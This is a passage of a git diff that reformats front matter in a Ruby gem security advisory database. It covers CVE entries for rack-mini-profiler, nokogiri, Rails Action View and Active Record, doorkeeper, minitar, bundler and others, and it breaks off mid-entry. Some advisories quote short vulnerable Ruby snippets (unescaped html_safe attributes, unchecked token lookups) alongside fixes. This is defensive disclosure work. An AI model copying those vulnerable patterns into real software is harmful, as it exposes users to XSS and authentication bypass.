-title: 'CVE-2016-4442 (rack-mini-profiler): rack-mini-profiler may disclose information
-  to unauthorized users'
-comments: false
-categories:
-- rack-mini-profiler
-advisory:
-  gem: rack-mini-profiler
-  cve: 2016-4442
-  ghsa: j5hj-fhc9-g24m
-  url: https://github.com/MiniProfiler/rack-mini-profiler/commit/4273771d65f1a7411e3ef5843329308d0e2d257c
-  title: rack-mini-profiler may disclose information to unauthorized users
-  date: 2016-05-18
-  description: |
-    Carefully crafted requests can expose information about strings and objects
-    allocated during the request for unauthorised users.
-  cvss_v3: 5.3
-  patched_versions:
-  - ">= 0.10.1"
-  related:
-    url:
-    - http://seclists.org/oss-sec/2016/q2/516
----
+---
+layout: advisory
+title: 'CVE-2016-4442 (rack-mini-profiler): rack-mini-profiler may disclose information
+  to unauthorized users'
+comments: false
+categories:
+- rack-mini-profiler
+advisory:
+  gem: rack-mini-profiler
+  cve: 2016-4442
+  ghsa: j5hj-fhc9-g24m
+  url: https://github.com/MiniProfiler/rack-mini-profiler/commit/4273771d65f1a7411e3ef5843329308d0e2d257c
+  title: rack-mini-profiler may disclose information to unauthorized users
+  date: 2016-05-18
+  description: |
+    Carefully crafted requests can expose information about strings and objects
+    allocated during the request for unauthorised users.
+  cvss_v3: 5.3
+  patched_versions:
+  - ">= 0.10.1"
+  related:
+    url:
+    - http://seclists.org/oss-sec/2016/q2/516
+---
diff --git a/advisories/_posts/2016-06-07-CVE-2015-8806.md b/advisories/_posts/2016-06-07-CVE-2015-8806.md
index 38bbde5d..25ea15da 100644
--- a/advisories/_posts/2016-06-07-CVE-2015-8806.md
+++ b/advisories/_posts/2016-06-07-CVE-2015-8806.md
@@ -1,50 +1,50 @@
----
-layout: advisory
-title: 'CVE-2015-8806 (nokogiri): Denial of service or RCE from libxml2 and libxslt'
-comments: false
-categories:
-- nokogiri
-advisory:
-  gem: nokogiri
-  cve: 2015-8806
-  ghsa: 7hp2-xwpj-95jq
-  url: https://github.com/sparklemotion/nokogiri/issues/1473
-  title: Denial of service or RCE from libxml2 and libxslt
-  date: 2016-06-07
-  description: |
-    Nokogiri is affected by series of vulnerabilities in libxml2 and libxslt,
-    which are libraries Nokogiri depends on. It was discovered that libxml2 and
-    libxslt incorrectly handled certain malformed documents, which can allow
-    malicious users to cause issues ranging from denial of service to remote code
-    execution attacks.
-
-    For more information, the Ubuntu Security Notice is a good start:
-    http://www.ubuntu.com/usn/usn-2994-1/
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 1.6.0"
-  patched_versions:
-  - ">= 1.6.8"
-  related:
-    cve:
-    - 2016-1762
-    - 2016-1833
-    - 2016-1834
-    - 2016-1835
-    - 2016-1836
-    - 2016-1837
-    - 2016-1838
-    - 2016-1839
-    - 2016-1840
-    - 2016-2073
-    - 2016-3627
-    - 2016-3705
-    - 2016-4447
-    - 2016-4449
-    - 2016-4483
-    url:
-    - https://github.com/sparklemotion/nokogiri/issues/1473
-    - https://github.com/sparklemotion/nokogiri/commit/03d402212707bd5dfa0a21b7de5e91a7f9d90028
-    - https://mail.gnome.org/archives/xml/2016-May/msg00023.html
-    - http://www.ubuntu.com/usn/usn-2994-1/
----
+---
+layout: advisory
+title: 'CVE-2015-8806 (nokogiri): Denial of service or RCE from libxml2 and libxslt'
+comments: false
+categories:
+- nokogiri
+advisory:
+  gem: nokogiri
+  cve: 2015-8806
+  ghsa: 7hp2-xwpj-95jq
+  url: https://github.com/sparklemotion/nokogiri/issues/1473
+  title: Denial of service or RCE from libxml2 and libxslt
+  date: 2016-06-07
+  description: |
+    Nokogiri is affected by series of vulnerabilities in libxml2 and libxslt,
+    which are libraries Nokogiri depends on. It was discovered that libxml2 and
+    libxslt incorrectly handled certain malformed documents, which can allow
+    malicious users to cause issues ranging from denial of service to remote code
+    execution attacks.
+
+    For more information, the Ubuntu Security Notice is a good start:
+    http://www.ubuntu.com/usn/usn-2994-1/
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 1.6.0"
+  patched_versions:
+  - ">= 1.6.8"
+  related:
+    cve:
+    - 2016-1762
+    - 2016-1833
+    - 2016-1834
+    - 2016-1835
+    - 2016-1836
+    - 2016-1837
+    - 2016-1838
+    - 2016-1839
+    - 2016-1840
+    - 2016-2073
+    - 2016-3627
+    - 2016-3705
+    - 2016-4447
+    - 2016-4449
+    - 2016-4483
+    url:
+    - https://github.com/sparklemotion/nokogiri/issues/1473
+    - https://github.com/sparklemotion/nokogiri/commit/03d402212707bd5dfa0a21b7de5e91a7f9d90028
+    - https://mail.gnome.org/archives/xml/2016-May/msg00023.html
+    - http://www.ubuntu.com/usn/usn-2994-1/
+---
diff --git a/advisories/_posts/2016-06-16-CVE-2016-10362.md b/advisories/_posts/2016-06-16-CVE-2016-10362.md
index 54dc2068..204f0b5a 100644
--- a/advisories/_posts/2016-06-16-CVE-2016-10362.md
+++ b/advisories/_posts/2016-06-16-CVE-2016-10362.md
@@ -1,28 +1,28 @@
----
-layout: advisory
-title: 'CVE-2016-10362 (logstash-core): Logstash Logs Sensitive Information'
-comments: false
-categories:
-- logstash-core
-advisory:
-  gem: logstash-core
-  cve: 2016-10362
-  ghsa: 3gg4-6hqg-2vjx
-  url: https://web.archive.org/web/20210730201452/http://www.securityfocus.com/bid/99154
-  title: Logstash Logs Sensitive Information
-  date: 2016-06-16
-  description: |
-    Prior to Logstash version 5.0.1, Elasticsearch Output plugin when updating
-    connections after sniffing, would log to file HTTP basic auth credentials.
-  cvss_v2: 4.0
-  cvss_v3: 6.5
-  patched_versions:
-  - ">= 5.0.1"
-  related:
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-10362
-    - https://web.archive.org/web/20210730201452/http://www.securityfocus.com/bid/99154
-    - https://www.opencve.io/cve/CVE-2016-10362
-    - https://www.elastic.co/community/security
-    - https://github.com/advisories/GHSA-3gg4-6hqg-2vjx
----
+---
+layout: advisory
+title: 'CVE-2016-10362 (logstash-core): Logstash Logs Sensitive Information'
+comments: false
+categories:
+- logstash-core
+advisory:
+  gem: logstash-core
+  cve: 2016-10362
+  ghsa: 3gg4-6hqg-2vjx
+  url: https://web.archive.org/web/20210730201452/http://www.securityfocus.com/bid/99154
+  title: Logstash Logs Sensitive Information
+  date: 2016-06-16
+  description: |
+    Prior to Logstash version 5.0.1, Elasticsearch Output plugin when updating
+    connections after sniffing, would log to file HTTP basic auth credentials.
+  cvss_v2: 4.0
+  cvss_v3: 6.5
+  patched_versions:
+  - ">= 5.0.1"
+  related:
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-10362
+    - https://web.archive.org/web/20210730201452/http://www.securityfocus.com/bid/99154
+    - https://www.opencve.io/cve/CVE-2016-10362
+    - https://www.elastic.co/community/security
+    - https://github.com/advisories/GHSA-3gg4-6hqg-2vjx
+---
diff --git a/advisories/_posts/2016-06-24-CVE-2016-5697.md b/advisories/_posts/2016-06-24-CVE-2016-5697.md
index 87cdc216..eb655f2a 100644
--- a/advisories/_posts/2016-06-24-CVE-2016-5697.md
+++ b/advisories/_posts/2016-06-24-CVE-2016-5697.md
@@ -1,26 +1,26 @@
----
-layout: advisory
-title: 'CVE-2016-5697 (ruby-saml): XML signature wrapping attack'
-comments: false
-categories:
-- ruby-saml
-advisory:
-  gem: ruby-saml
-  cve: 2016-5697
-  ghsa: 36p7-xjw8-h6f2
-  url: https://github.com/onelogin/ruby-saml/commit/a571f52171e6bfd87db59822d1d9e8c38fb3b995
-  title: XML signature wrapping attack
-  date: 2016-06-24
-  description: |
-    ruby-saml prior to version 1.3.0 is vulnerable to an XML signature wrapping attack
-    in the specific scenario where there was a signature that referenced at the same time
-    2 elements (but past the scheme validator process since 1 of the element was inside
-    the encrypted assertion).
-
-    ruby-saml users must update to 1.3.0, which implements 3 extra validations to
-    mitigate this kind of attack.
-  cvss_v2: 5.0
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 1.3.0"
----
+---
+layout: advisory
+title: 'CVE-2016-5697 (ruby-saml): XML signature wrapping attack'
+comments: false
+categories:
+- ruby-saml
+advisory:
+  gem: ruby-saml
+  cve: 2016-5697
+  ghsa: 36p7-xjw8-h6f2
+  url: https://github.com/onelogin/ruby-saml/commit/a571f52171e6bfd87db59822d1d9e8c38fb3b995
+  title: XML signature wrapping attack
+  date: 2016-06-24
+  description: |
+    ruby-saml prior to version 1.3.0 is vulnerable to an XML signature wrapping attack
+    in the specific scenario where there was a signature that referenced at the same time
+    2 elements (but past the scheme validator process since 1 of the element was inside
+    the encrypted assertion).
+
+    ruby-saml users must update to 1.3.0, which implements 3 extra validations to
+    mitigate this kind of attack.
+  cvss_v2: 5.0
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 1.3.0"
+---
diff --git a/advisories/_posts/2016-07-27-CVE-2016-10735.md b/advisories/_posts/2016-07-27-CVE-2016-10735.md
index 5fd4d1e0..5c54de84 100644
--- a/advisories/_posts/2016-07-27-CVE-2016-10735.md
+++ b/advisories/_posts/2016-07-27-CVE-2016-10735.md
@@ -1,24 +1,24 @@
----
-layout: advisory
-title: 'CVE-2016-10735 (bootstrap): XSS vulnerability via data-target in bootstrap'
-comments: false
-categories:
-- bootstrap
-advisory:
-  gem: bootstrap
-  cve: 2016-10735
-  ghsa: 4p24-vmcr-4gqj
-  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
-  title: XSS vulnerability via data-target in bootstrap
-  date: 2016-07-27
-  description: |
-    In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2,
-    XSS is possible in the data-target attribute.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 4.0.0-beta.2"
-  related:
-    url:
-    - https://github.com/twbs/bootstrap/issues/20184
----
+---
+layout: advisory
+title: 'CVE-2016-10735 (bootstrap): XSS vulnerability via data-target in bootstrap'
+comments: false
+categories:
+- bootstrap
+advisory:
+  gem: bootstrap
+  cve: 2016-10735
+  ghsa: 4p24-vmcr-4gqj
+  url: https://blog.getbootstrap.com/2018/07/12/bootstrap-4-1-2/
+  title: XSS vulnerability via data-target in bootstrap
+  date: 2016-07-27
+  description: |
+    In Bootstrap 3.x before 3.4.0 and 4.x-beta before 4.0.0-beta.2,
+    XSS is possible in the data-target attribute.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 4.0.0-beta.2"
+  related:
+    url:
+    - https://github.com/twbs/bootstrap/issues/20184
+---
diff --git a/advisories/_posts/2016-08-11-CVE-2016-6316.md b/advisories/_posts/2016-08-11-CVE-2016-6316.md
index e43fffc0..03b08d68 100644
--- a/advisories/_posts/2016-08-11-CVE-2016-6316.md
+++ b/advisories/_posts/2016-08-11-CVE-2016-6316.md
@@ -1,61 +1,61 @@
----
-layout: advisory
-title: 'CVE-2016-6316 (actionview): Possible XSS Vulnerability in Action View'
-comments: false
-categories:
-- actionview
-- rails
-advisory:
-  gem: actionview
-  framework: rails
-  cve: 2016-6316
-  ghsa: pc3m-v286-2jwj
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/I-VWr034ouk
-  title: Possible XSS Vulnerability in Action View
-  date: 2016-08-11
-  description: |
-    There is a possible XSS vulnerability in Action View.  Text declared as "HTML
-    safe" will not have quotes escaped when used as attribute values in tag
-    helpers.
-
-    Impact
-    ------
-
-    Text declared as "HTML safe" when passed as an attribute value to a tag helper
-    will not have quotes escaped which can lead to an XSS attack.  Impacted code
-    looks something like this:
-
-    ```ruby
-    content_tag(:div, "hi", title: user_input.html_safe)
-    ```
-
-    Some helpers like the `sanitize` helper will automatically mark strings as
-    "HTML safe", so impacted code could also look something like this:
-
-    ```ruby
-    content_tag(:div, "hi", title: sanitize(user_input))
-    ```
-
-    All users running an affected release should either upgrade or use one of the
-    workarounds immediately.
-
-    Workarounds
-    -----------
-    You can work around this issue by either *not* marking arbitrary user input as
-    safe, or by manually escaping quotes like this:
-
-    ```ruby
-    def escape_quotes(value)
-      value.gsub(/"/, '&quot;'.freeze)
-    end
-
-    content_tag(:div, "hi", title: escape_quotes(sanitize(user_input)))
-    ```
-  cvss_v3: 6.1
-  unaffected_versions:
-  - "< 3.0.0"
-  patched_versions:
-  - "~> 4.2.7.1"
-  - "~> 4.2.8"
-  - ">= 5.0.0.1"
----
+---
+layout: advisory
+title: 'CVE-2016-6316 (actionview): Possible XSS Vulnerability in Action View'
+comments: false
+categories:
+- actionview
+- rails
+advisory:
+  gem: actionview
+  framework: rails
+  cve: 2016-6316
+  ghsa: pc3m-v286-2jwj
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/I-VWr034ouk
+  title: Possible XSS Vulnerability in Action View
+  date: 2016-08-11
+  description: |
+    There is a possible XSS vulnerability in Action View.  Text declared as "HTML
+    safe" will not have quotes escaped when used as attribute values in tag
+    helpers.
+
+    Impact
+    ------
+
+    Text declared as "HTML safe" when passed as an attribute value to a tag helper
+    will not have quotes escaped which can lead to an XSS attack.  Impacted code
+    looks something like this:
+
+    ```ruby
+    content_tag(:div, "hi", title: user_input.html_safe)
+    ```
+
+    Some helpers like the `sanitize` helper will automatically mark strings as
+    "HTML safe", so impacted code could also look something like this:
+
+    ```ruby
+    content_tag(:div, "hi", title: sanitize(user_input))
+    ```
+
+    All users running an affected release should either upgrade or use one of the
+    workarounds immediately.
+
+    Workarounds
+    -----------
+    You can work around this issue by either *not* marking arbitrary user input as
+    safe, or by manually escaping quotes like this:
+
+    ```ruby
+    def escape_quotes(value)
+      value.gsub(/"/, '&quot;'.freeze)
+    end
+
+    content_tag(:div, "hi", title: escape_quotes(sanitize(user_input)))
+    ```
+  cvss_v3: 6.1
+  unaffected_versions:
+  - "< 3.0.0"
+  patched_versions:
+  - "~> 4.2.7.1"
+  - "~> 4.2.8"
+  - ">= 5.0.0.1"
+---
diff --git a/advisories/_posts/2016-08-11-CVE-2016-6317.md b/advisories/_posts/2016-08-11-CVE-2016-6317.md
index 07217f25..c25440d2 100644
--- a/advisories/_posts/2016-08-11-CVE-2016-6317.md
+++ b/advisories/_posts/2016-08-11-CVE-2016-6317.md
@@ -1,79 +1,79 @@
----
-layout: advisory
-title: 'CVE-2016-6317 (activerecord): Unsafe Query Generation Risk in Active Record'
-comments: false
-categories:
-- activerecord
-- rails
-advisory:
-  gem: activerecord
-  framework: rails
-  cve: 2016-6317
-  ghsa: pr3r-4wrp-r2pv
-  url: https://groups.google.com/forum/#!topic/rubyonrails-security/rgO20zYW33s
-  title: Unsafe Query Generation Risk in Active Record
-  date: 2016-08-11
-  description: |
-    There is a vulnerability when Active Record is used in conjunction with JSON
-    parameter parsing. This vulnerability is similar to CVE-2012-2660,
-    CVE-2012-2694 and CVE-2013-0155.
-
-    Impact
-    ------
-
-    Due to the way Active Record interprets parameters in combination with the way
-    that JSON parameters are parsed, it is possible for an attacker to issue
-    unexpected database queries with "IS NULL" or empty where clauses.  This issue
-    does *not* let an attacker insert arbitrary values into an SQL query, however
-    they can cause the query to check for NULL or eliminate a WHERE clause when
-    most users wouldn't expect it.
-
-    For example, a system has password reset with token functionality:
-
-    ```ruby
-        unless params[:token].nil?
-          user = User.find_by_token(params[:token])
-          user.reset_password!
-        end
-    ```
-
-    An attacker can craft a request such that `params[:token]` will return
-    `[nil]`.  The `[nil]` value will bypass the test for nil, but will still add
-    an "IN ('xyz', NULL)" clause to the SQL query.
-
-    Similarly, an attacker can craft a request such that `params[:token]` will
-    return an empty hash.  An empty hash will eliminate the WHERE clause of the
-    query, but can bypass the `nil?` check.
-
-    Note that this impacts not only dynamic finders (`find_by_*`) but also
-    relations (`User.where(:name => params[:name])`).
-
-    All users running an affected release should either upgrade or use one of the
-    work arounds immediately. All users running an affected release should upgrade
-    immediately. Please note, this vulnerability is a variant of CVE-2012-2660,
-    CVE-2012-2694, and CVE-2013-0155.  Even if you upgraded to address those
-    issues, you must take action again.
-
-    If this chance in behavior impacts your application, you can manually decode
-    the original values from the request like so:
-
-        `ActiveSupport::JSON.decode(request.body)`
-
-    Workarounds
-    -----------
-    This problem can be mitigated by casting the parameter to a string before
-    passing it to Active Record.  For example:
-
-      ```ruby
-        unless params[:token].nil? || params[:token].to_s.empty?
-          user = User.find_by_token(params[:token].to_s)
-          user.reset_password!
-        end
-      ```
-  cvss_v3: 7.5
-  unaffected_versions:
-  - "< 4.2.0"
-  - ">= 5.0.0"
-  patched_versions:
-  - ">= 4.2.7.1"
----
+---
+layout: advisory
+title: 'CVE-2016-6317 (activerecord): Unsafe Query Generation Risk in Active Record'
+comments: false
+categories:
+- activerecord
+- rails
+advisory:
+  gem: activerecord
+  framework: rails
+  cve: 2016-6317
+  ghsa: pr3r-4wrp-r2pv
+  url: https://groups.google.com/forum/#!topic/rubyonrails-security/rgO20zYW33s
+  title: Unsafe Query Generation Risk in Active Record
+  date: 2016-08-11
+  description: |
+    There is a vulnerability when Active Record is used in conjunction with JSON
+    parameter parsing. This vulnerability is similar to CVE-2012-2660,
+    CVE-2012-2694 and CVE-2013-0155.
+
+    Impact
+    ------
+
+    Due to the way Active Record interprets parameters in combination with the way
+    that JSON parameters are parsed, it is possible for an attacker to issue
+    unexpected database queries with "IS NULL" or empty where clauses.  This issue
+    does *not* let an attacker insert arbitrary values into an SQL query, however
+    they can cause the query to check for NULL or eliminate a WHERE clause when
+    most users wouldn't expect it.
+
+    For example, a system has password reset with token functionality:
+
+    ```ruby
+        unless params[:token].nil?
+          user = User.find_by_token(params[:token])
+          user.reset_password!
+        end
+    ```
+
+    An attacker can craft a request such that `params[:token]` will return
+    `[nil]`.  The `[nil]` value will bypass the test for nil, but will still add
+    an "IN ('xyz', NULL)" clause to the SQL query.
+
+    Similarly, an attacker can craft a request such that `params[:token]` will
+    return an empty hash.  An empty hash will eliminate the WHERE clause of the
+    query, but can bypass the `nil?` check.
+
+    Note that this impacts not only dynamic finders (`find_by_*`) but also
+    relations (`User.where(:name => params[:name])`).
+
+    All users running an affected release should either upgrade or use one of the
+    work arounds immediately. All users running an affected release should upgrade
+    immediately. Please note, this vulnerability is a variant of CVE-2012-2660,
+    CVE-2012-2694, and CVE-2013-0155.  Even if you upgraded to address those
+    issues, you must take action again.
+
+    If this chance in behavior impacts your application, you can manually decode
+    the original values from the request like so:
+
+        `ActiveSupport::JSON.decode(request.body)`
+
+    Workarounds
+    -----------
+    This problem can be mitigated by casting the parameter to a string before
+    passing it to Active Record.  For example:
+
+      ```ruby
+        unless params[:token].nil? || params[:token].to_s.empty?
+          user = User.find_by_token(params[:token].to_s)
+          user.reset_password!
+        end
+      ```
+  cvss_v3: 7.5
+  unaffected_versions:
+  - "< 4.2.0"
+  - ">= 5.0.0"
+  patched_versions:
+  - ">= 4.2.7.1"
+---
diff --git a/advisories/_posts/2016-08-18-CVE-2016-6582.md b/advisories/_posts/2016-08-18-CVE-2016-6582.md
index f64fbef6..3ae59aa3 100644
--- a/advisories/_posts/2016-08-18-CVE-2016-6582.md
+++ b/advisories/_posts/2016-08-18-CVE-2016-6582.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2016-6582 (doorkeeper): Doorkeeper gem does not revoke tokens & uses wrong
-  auth/auth method'
-comments: false
-categories:
-- doorkeeper
-advisory:
-  gem: doorkeeper
-  cve: 2016-6582
-  ghsa: 3m6r-39p3-jq25
-  url: http://www.openwall.com/lists/oss-security/2016/08/19/2
-  title: Doorkeeper gem does not revoke tokens & uses wrong auth/auth method
-  date: 2016-08-18
-  description: |
-    Doorkeeper failed to implement OAuth 2.0 Token Revocation (RFC 7009) in the
-    following ways:
-
-    1. Public clients making valid, unauthenticated calls to revoke a token
-       would not have their token revoked
-    2. Requests were not properly authenticating the *client credentials* but
-       were, instead, looking at the access token in a second location
-    3. Because of 2, the requests were also not authorizing confidential
-       clients' ability to revoke a given token. It should only revoke tokens
-       that belong to it.
-
-    The security implication is: OAuth 2.0 clients who "log out" a user expect
-    to have the corresponding access & refresh tokens revoked, preventing an
-    attacker who may have already hijacked the session from continuing to
-    impersonate the victim. Because of the bug described above, this is not the
-    case. As far as OWASP is concerned, this counts as broken authentication
-    design.
-
-    MITRE has assigned CVE-2016-6582 due to the security issues raised. An
-    attacker, thanks to 1, can replay a hijacked session after a victim logs
-    out/revokes their token. Additionally, thanks to 2 & 3, an attacker via a
-    compromised confidential client could "grief" other clients by revoking
-    their tokens (albeit this is an exceptionally narrow attack with little
-    value).
-  cvss_v3: 9.1
-  unaffected_versions:
-  - "< 1.2.0"
-  patched_versions:
-  - ">= 4.2.0"
-  related:
-    url:
-    - https://github.com/doorkeeper-gem/doorkeeper/commit/fb938051777a3c9cb071e96fc66458f8f615bd53
----
+---
+layout: advisory
+title: 'CVE-2016-6582 (doorkeeper): Doorkeeper gem does not revoke tokens & uses wrong
+  auth/auth method'
+comments: false
+categories:
+- doorkeeper
+advisory:
+  gem: doorkeeper
+  cve: 2016-6582
+  ghsa: 3m6r-39p3-jq25
+  url: http://www.openwall.com/lists/oss-security/2016/08/19/2
+  title: Doorkeeper gem does not revoke tokens & uses wrong auth/auth method
+  date: 2016-08-18
+  description: |
+    Doorkeeper failed to implement OAuth 2.0 Token Revocation (RFC 7009) in the
+    following ways:
+
+    1. Public clients making valid, unauthenticated calls to revoke a token
+       would not have their token revoked
+    2. Requests were not properly authenticating the *client credentials* but
+       were, instead, looking at the access token in a second location
+    3. Because of 2, the requests were also not authorizing confidential
+       clients' ability to revoke a given token. It should only revoke tokens
+       that belong to it.
+
+    The security implication is: OAuth 2.0 clients who "log out" a user expect
+    to have the corresponding access & refresh tokens revoked, preventing an
+    attacker who may have already hijacked the session from continuing to
+    impersonate the victim. Because of the bug described above, this is not the
+    case. As far as OWASP is concerned, this counts as broken authentication
+    design.
+
+    MITRE has assigned CVE-2016-6582 due to the security issues raised. An
+    attacker, thanks to 1, can replay a hijacked session after a victim logs
+    out/revokes their token. Additionally, thanks to 2 & 3, an attacker via a
+    compromised confidential client could "grief" other clients by revoking
+    their tokens (albeit this is an exceptionally narrow attack with little
+    value).
+  cvss_v3: 9.1
+  unaffected_versions:
+  - "< 1.2.0"
+  patched_versions:
+  - ">= 4.2.0"
+  related:
+    url:
+    - https://github.com/doorkeeper-gem/doorkeeper/commit/fb938051777a3c9cb071e96fc66458f8f615bd53
+---
diff --git a/advisories/_posts/2016-08-22-CVE-2016-10173.md b/advisories/_posts/2016-08-22-CVE-2016-10173.md
index af9e6980..39c42279 100644
--- a/advisories/_posts/2016-08-22-CVE-2016-10173.md
+++ b/advisories/_posts/2016-08-22-CVE-2016-10173.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2016-10173 (minitar): Minitar Directory Traversal Vulnerability'
-comments: false
-categories:
-- minitar
-advisory:
-  gem: minitar
-  cve: 2016-10173
-  ghsa: h5g2-38x9-4gv3
-  url: https://github.com/halostatue/minitar/issues/16
-  title: Minitar Directory Traversal Vulnerability
-  date: 2016-08-22
-  description: |
-    Minitar allows attackers to overwrite arbitrary files during archive
-    extraction via a .. (dot dot) in an extracted filename. Analogous
-    vulnerabilities for unzip and tar:
-    https://www.cvedetails.com/cve/CVE-2001-1268/ and
-    http://www.cvedetails.com/cve/CVE-2001-1267/
-
-    Credit: ecneladis
-  cvss_v3: 7.5
-  patched_versions:
-  - ">= 0.6.0"
-  related:
-    url:
-    - https://github.com/halostatue/minitar/issues/16
-    - https://github.com/halostatue/minitar/commit/e25205ecbb6277ae8a3df1e6a306d7ed4458b6e4
----
+---
+layout: advisory
+title: 'CVE-2016-10173 (minitar): Minitar Directory Traversal Vulnerability'
+comments: false
+categories:
+- minitar
+advisory:
+  gem: minitar
+  cve: 2016-10173
+  ghsa: h5g2-38x9-4gv3
+  url: https://github.com/halostatue/minitar/issues/16
+  title: Minitar Directory Traversal Vulnerability
+  date: 2016-08-22
+  description: |
+    Minitar allows attackers to overwrite arbitrary files during archive
+    extraction via a .. (dot dot) in an extracted filename. Analogous
+    vulnerabilities for unzip and tar:
+    https://www.cvedetails.com/cve/CVE-2001-1268/ and
+    http://www.cvedetails.com/cve/CVE-2001-1267/
+
+    Credit: ecneladis
+  cvss_v3: 7.5
+  patched_versions:
+  - ">= 0.6.0"
+  related:
+    url:
+    - https://github.com/halostatue/minitar/issues/16
+    - https://github.com/halostatue/minitar/commit/e25205ecbb6277ae8a3df1e6a306d7ed4458b6e4
+---
diff --git a/advisories/_posts/2016-08-27-CVE-2016-7103.md b/advisories/_posts/2016-08-27-CVE-2016-7103.md
index fe8d2632..a44e4399 100644
--- a/advisories/_posts/2016-08-27-CVE-2016-7103.md
+++ b/advisories/_posts/2016-08-27-CVE-2016-7103.md
@@ -1,29 +1,29 @@
----
-layout: advisory
-title: 'CVE-2016-7103 (jquery-ui-rails): XSS Vulnerability on closeText option of
-  Dialog jQuery UI'
-comments: false
-categories:
-- jquery-ui-rails
-- rails
-advisory:
-  gem: jquery-ui-rails
-  framework: rails
-  cve: 2016-7103
-  ghsa: hpcf-8vf9-q4gj
-  url: https://github.com/jquery/api.jqueryui.com/issues/281
-  title: XSS Vulnerability on closeText option of Dialog jQuery UI
-  date: 2016-08-27
-  description: |
-    Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might
-    allow remote attackers to inject arbitrary web script or HTML via the
-    closeText parameter of the dialog function.
-  cvss_v2: 4.3
-  cvss_v3: 6.1
-  patched_versions:
-  - ">= 6.0.0"
-  related:
-    url:
-    - https://github.com/jquery/jquery-ui/pull/1635
-    - https://github.com/jquery-ui-rails/jquery-ui-rails/blob/master/History.md#600
----
+---
+layout: advisory
+title: 'CVE-2016-7103 (jquery-ui-rails): XSS Vulnerability on closeText option of
+  Dialog jQuery UI'
+comments: false
+categories:
+- jquery-ui-rails
+- rails
+advisory:
+  gem: jquery-ui-rails
+  framework: rails
+  cve: 2016-7103
+  ghsa: hpcf-8vf9-q4gj
+  url: https://github.com/jquery/api.jqueryui.com/issues/281
+  title: XSS Vulnerability on closeText option of Dialog jQuery UI
+  date: 2016-08-27
+  description: |
+    Cross-site scripting (XSS) vulnerability in jQuery UI before 1.12.0 might
+    allow remote attackers to inject arbitrary web script or HTML via the
+    closeText parameter of the dialog function.
+  cvss_v2: 4.3
+  cvss_v3: 6.1
+  patched_versions:
+  - ">= 6.0.0"
+  related:
+    url:
+    - https://github.com/jquery/jquery-ui/pull/1635
+    - https://github.com/jquery-ui-rails/jquery-ui-rails/blob/master/History.md#600
+---
diff --git a/advisories/_posts/2016-10-06-CVE-2016-7954.md b/advisories/_posts/2016-10-06-CVE-2016-7954.md
index 7631a636..792752dd 100644
--- a/advisories/_posts/2016-10-06-CVE-2016-7954.md
+++ b/advisories/_posts/2016-10-06-CVE-2016-7954.md
@@ -1,48 +1,48 @@
----
-layout: advisory
-title: 'CVE-2016-7954 (bundler): Allows an attacker to inject arbitrary code into
-  your application via any secondary Gem source declared in your Gemfile'
-comments: false
-categories:
-- bundler
-advisory:
-  gem: bundler
-  cve: 2016-7954
-  ghsa: jvgm-pfqv-887x
-  url: https://collectiveidea.com/blog/archives/2016/10/06/bundlers-multiple-source-security-vulnerability
-  title: Allows an attacker to inject arbitrary code into your application via any
-    secondary Gem source declared in your Gemfile
-  date: 2016-10-06
-  description: |
-    Bundler 1.x might allow remote attackers to inject arbitrary Ruby
-    code into an application by leveraging a Gem name collision on a
-    secondary source.
-
-    Please note that this vulnerability only applies for Ruby
-    projects using Bundler < 2.0 with Gemfiles having 2 or more
-    "source" lines.
-
-    In other words, if the user's Gemfile does not use multiple
-    sources, this vulnerability can be ignored.
-  cvss_v2: 7.5
-  cvss_v3: 9.8
-  patched_versions:
-  - ">= 2.0.0"
-  related:
-    cve:
-    - 2013-0334
-    url:
-    - https://nvd.nist.gov/vuln/detail/CVE-2016-7954
-    - https://collectiveidea.com/blog/archives/2016/10/06/bundlers-multiple-source-security-vulnerability
-    - https://bundler.io/blog/2014/08/14/bundler-may-install-gems-from-a-different-source-than-expected-cve-2013-0334.html
-    - https://github.com/advisories/GHSA-jvgm-pfqv-887x
-    - https://seclists.org/oss-sec/2016/q4/25
-    - https://seclists.org/oss-sec/2016/q4/18
-    - https://seclists.org/oss-sec/2016/q4/20
-    - https://github.com/rubygems/bundler/pull/3696
-    - https://github.com/rubygems/bundler/issues/3671
-    - https://github.com/rubygems/bundler/issues/5274
-    - https://github.com/rubygems/bundler/issues/5051
-    - https://github.com/rubygems/bundler/issues/5062
-  notes: 'NOTE: This might overlap CVE-2013-0334.; GHSA is unreviewed'
----
+---
+layout: advisory
+title: 'CVE-2016-7954 (bundler): Allows an attacker to inject arbitrary code into
+  your application via any secondary Gem source declared in your Gemfile'
+comments: false
+categories:
+- bundler
+advisory:
+  gem: bundler
+  cve: 2016-7954
+  ghsa: jvgm-pfqv-887x
+  url: https://collectiveidea.com/blog/archives/2016/10/06/bundlers-multiple-source-security-vulnerability
+  title: Allows an attacker to inject arbitrary code into your application via any
+    secondary Gem source declared in your Gemfile
+  date: 2016-10-06
+  description: |
+    Bundler 1.x might allow remote attackers to inject arbitrary Ruby
+    code into an application by leveraging a Gem name collision on a
+    secondary source.
+
+    Please note that this vulnerability only applies for Ruby
+    projects using Bundler < 2.0 with Gemfiles having 2 or more
+    "source" lines.
+
+    In other words, if the user's Gemfile does not use multiple
+    sources, this vulnerability can be ignored.
+  cvss_v2: 7.5
+  cvss_v3: 9.8
+  patched_versions:
+  - ">= 2.0.0"
+  related:
+    cve:
+    - 2013-0334
+    url:
+    - https://nvd.nist.gov/vuln/detail/CVE-2016-7954
+    - https://collectiveidea.com/blog/archives/2016/10/06/bundlers-multiple-source-security-vulnerability
+    - https://bundler.io/blog/2014/08/14/bundler-may-install-gems-from-a-different-source-than-expected-cve-2013-0334.html
